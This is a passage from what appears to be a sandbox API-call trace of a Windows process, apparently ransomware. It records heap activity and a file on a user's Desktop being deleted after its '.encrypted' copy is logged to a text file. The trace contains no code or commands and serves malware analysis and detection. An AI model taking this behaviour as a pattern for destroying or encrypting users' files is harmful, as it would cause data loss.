dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.775] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.775] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.776] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.776] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.776] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.776] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.776] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpFilePart=0x0) returned 0x3e [0029.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x11a25f80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 0x7c2100 [0029.776] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoaigepyfblnzs8itqgh.m4a")) returned 1 [0029.777] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x11a25f80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 0 [0029.777] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.777] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.778] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.778] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.778] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.778] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.778] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.778] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.779] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.779] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.779] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.779] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.779] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.779] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.779] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x154, lpOverlapped=0x0) returned 1 [0029.779] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.779] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x154, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.780] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.encrypted.m4a\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0029.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f3630 [0029.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.encrypted.m4a\r\n", cchWideChar=75, lpMultiByteStr=0x7f3630, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 75 [0029.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.780] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4a, lpOverlapped=0x0) returned 1 [0029.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.780] CloseHandle (hObject=0x140) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.781] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.781] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.782] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.782] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.783] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.783] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af588 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.783] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 